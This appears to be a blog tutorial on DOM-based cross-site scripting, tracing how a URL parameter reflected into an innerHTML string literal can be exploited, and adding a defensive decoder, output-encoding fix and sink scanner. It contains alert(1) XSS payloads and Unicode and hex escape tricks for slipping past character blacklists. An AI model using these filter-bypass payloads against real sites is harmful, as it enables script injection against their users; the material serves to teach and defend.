Dom Based XSS – Introduction

Introduction to DOM based XSS:
Rather than rewrite what is already covered well elsewhere, start with the OWASP page:
https://www.owasp.org/index.php/DOM_Based_XSS

Discovering and Exploiting:
1) Before learning DOM Based XSS, make sure you have a few basics of HTML and JS.

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="aaaaaaa";
</script>

[screenshot: DomXSS1]

2) The string aaaaaaa can be replaced with HTML, as follows:

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="<img src=1 onerror=alert(1)>";
</script>

[screenshots: DomXSS2, DomXSS3]

3) This time it popped alert(1), but that will not work every time:
Characters in a JavaScript string literal can also be written as Unicode escapes, so < can be written as \u003c and > as \u003e. Any online encoder will produce these for you.

<div id="name">hello</div>
<script>
document.getElementById("name").innerHTML="\u003cimg src=1 onerror=alert(1)\u003e";
</script>

[screenshots: DomXSS4, DomXSS5]

4) All of this may seem trivial right now, but it is needed for the later explanation.

5) Let's analyze it through an example:
http://localhost/?gfe_rd=cr&ei=aaaaaaa&gws_rd=ssl
Relevant source code view (snippet):
<strong id="titlename">Searched by brand:aaaaaaa</strong></div>
<script>
if("aaaaaaa"=="")
document.getElementById("titlename").innerHTML="Searchable:Regions";
if ("brand 1" == "category 1") document.getElementById("titlename").innerHTML="Search:aaaaaaa";
if ("brand 1" == "category 2")
document.getElementById("titlename").innerHTML="Search:aaaaaaa";
if ("brand 1" == "category 3")
document.getElementById("titlename").innerHTML="Search:aaaaaaa";
</script>

6) Inside this JS string, we know that < and > are filtered, so how do we approach it?
Let's see.
Note: we are dealing with situations where the reflected value lands inside innerHTML="...".
if ("brand 1" == "category 1")
document.getElementById("titleshow").innerHTML=
"Search:\u003cimg src=1 onerror=alert(1)\u003e";
This pops alert(1).

It does not end there: if the space is filtered out as well, the space can be encoded too. Let's see the payload:
if ("brand 1" == "category 1")
document.getElementById("titleshow").innerHTML=
"Search: \u003cimg\u0020src=1\u0020onerror=alert(1)\u003e";

This also pops alert(1), unless the filter comes into action again: if \u003c and \u003e are filtered out, they get converted to &lt; and &gt;.
Now what???
Now check whether only \u003c is filtered, or both \u0020 and \u003c. If only \u003c is filtered out, we have learned that just a few specific keywords are blacklisted.
There are other ways to bypass that: < can also be written as \x3c and > as \x3e.

7) The final URL becomes:
http://localhost/?gfe_rd=cr&ei=x3cimgu0020src=1u0020onerror=alert(1)x3e&gws_rd=ssl
So, finally, this pops up.
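The lesson behind steps 3, 6 and 7 is that the browser decodes \uXXXX and \xXX escapes while parsing the script, before innerHTML ever sees the value, so a blacklist that looks for literal angle brackets (or one spelling of their escape) judges the wrong string. The following is an added example, not code from the original post or from the site it describes: it decodes a string literal the way the JS parser does, tests a blacklist of the kind described above against the decoded result, and shows the server-side fix (encode every non-alphanumeric character of the reflected value as \uXXXX, backslash included, and use textContent as the sink). All function names and the sample values are constructed for the example.

```javascript
// Added example (not from the original post): why an HTML-level "<"/">"
// blacklist fails when user input is reflected into a JavaScript string
// literal, and what the server should do instead.

// Decode the escape forms a JS parser resolves inside a string literal:
// \uXXXX and \xXX. This is the value innerHTML receives after the script
// text has been parsed, i.e. the value a filter actually has to judge.
function decodeJsEscapes(literalBody) {
  return literalBody.replace(/\\u([0-9a-fA-F]{4})|\\x([0-9a-fA-F]{2})/g,
    (_, u, x) => String.fromCharCode(parseInt(u || x, 16)));
}

// A blacklist of the kind the post describes: it removes raw angle brackets
// and the one escape spelling it knows about. Included only to be tested.
function weakBlacklist(input) {
  return input.replace(/[<>]/g, '').replace(/\\u003[ce]/gi, '');
}

// Does markup survive once the browser has decoded the literal? This is the
// check a filter would need to run, and it shows why a blacklist is fragile.
function markupSurvives(filteredLiteralBody) {
  return /[<>]/.test(decodeJsEscapes(filteredLiteralBody));
}

// Correct server-side encoding for a value placed inside a JS string literal
// (the OWASP "JavaScript escape" rule, not the post's code): every UTF-16
// unit outside [A-Za-z0-9] becomes \uXXXX, so the input can neither supply
// its own escapes nor close the surrounding quote.
function encodeForJsString(value) {
  let out = '';
  for (let i = 0; i < value.length; i++) {
    const ch = value[i];
    out += /[A-Za-z0-9]/.test(ch)
      ? ch
      : '\\u' + value.charCodeAt(i).toString(16).padStart(4, '0');
  }
  return out;
}

// The script line the server should emit instead of the vulnerable one in
// the post: encoded literal, and textContent rather than innerHTML as sink.
function renderTitleScript(userValue) {
  return 'document.getElementById("titlename").textContent = "Search:' +
    encodeForJsString(userValue) + '";';
}

// Constructed sample: the hex/Unicode-escaped payload from step 7.
const SAMPLE_RAW = '\\x3cimg\\u0020src=1\\u0020onerror=alert(1)\\x3e';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('after blacklist :', weakBlacklist(SAMPLE_RAW));
  console.log('browser decodes :', decodeJsEscapes(weakBlacklist(SAMPLE_RAW)));
  console.log('markup survives :', markupSurvives(weakBlacklist(SAMPLE_RAW)));
  console.log('safe script line:', renderTitleScript(SAMPLE_RAW));
}
```

Run it with node; the blacklist leaves the \x3c spelling untouched, the decoded value is an img element, and the encoded script line round-trips to the original text while landing in a sink that cannot create elements. The point is not to refine the blacklist but to replace it: a filter would have to decode exactly as the parser does, for every spelling, which is what output encoding plus a text-only sink makes unnecessary.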

This covers the following DOM XSS sinks:
document.getElementById("x").innerHTML="yyyyyyy";
document.write("yyyyyyy");

Some sites use third-party JS libraries such as jQuery, where the sink looks like:
$("#x").html("yyyyyyy");
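When reviewing a site's scripts, the three sink shapes just listed are the first thing to locate. The following is an added example, not part of the original post or of any library it mentions: a small scanner that finds innerHTML assignments, document.write calls and jQuery .html() calls in JavaScript source text, run here over a constructed sample that also contains two lines that must not match (a textContent assignment and an innerHTML comparison). Pattern names and the sample lines are constructed for the example.

```javascript
// Added example (not from the original post): a source scanner for the DOM
// XSS sinks listed above, of the kind a reviewer runs over a site's scripts
// before tracing which reflected value can reach them.

// One regex per sink family. Each tolerates whitespace, either quote style
// and chained jQuery calls, because real code is rarely tidy. The innerHTML
// pattern requires a single "=" so comparisons (== / ===) are not reported.
const SINK_PATTERNS = [
  { name: 'innerHTML assignment', re: /\.innerHTML\s*=(?!=)/ },
  { name: 'document.write',       re: /\bdocument\.write(ln)?\s*\(/ },
  { name: 'jQuery .html()',       re: /\$\([^)]*\)(\.[A-Za-z_$][\w$]*\([^)]*\))*\.html\s*\(/ },
];

// Scan JavaScript source text; return one finding per matching line.
function findDomSinks(source) {
  const findings = [];
  source.split('\n').forEach((line, idx) => {
    for (const { name, re } of SINK_PATTERNS) {
      if (re.test(line)) {
        findings.push({ line: idx + 1, sink: name, code: line.trim() });
      }
    }
  });
  return findings;
}

// Convenience for tests and quick triage: just the line numbers that hit.
function sinkLines(source) {
  return findDomSinks(source).map(f => f.line);
}

// Constructed sample: the three sink shapes from the post, plus a safe
// textContent sink and an innerHTML comparison that must not be flagged.
const SAMPLE_JS = [
  'document.getElementById("titlename").innerHTML = "Search:" + q;',
  'document.write("<b>" + q + "</b>");',
  '$("#x").html(q);',
  'document.getElementById("titlename").textContent = q;',
  'if (el.innerHTML == "") { reset(); }',
].join('\n');

if (typeof require !== 'undefined' && require.main === module) {
  for (const f of findDomSinks(SAMPLE_JS)) {
    console.log(`line ${f.line}: ${f.sink}  ->  ${f.code}`);
  }
}
```

A hit from this scanner is a place to look, not a vulnerability on its own: the sink is only exploitable when the value written to it is attacker-controlled (a URL parameter, location.hash, postMessage data, and so on), which the reflected-string analysis in steps 5 to 7 is about. Swapping innerHTML for textContent, as on line 4 of the sample, removes the sink entirely.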

Finally, of course, some caveats also need to be mentioned.
aa.innerHTML="yyyyyyyyyyyy";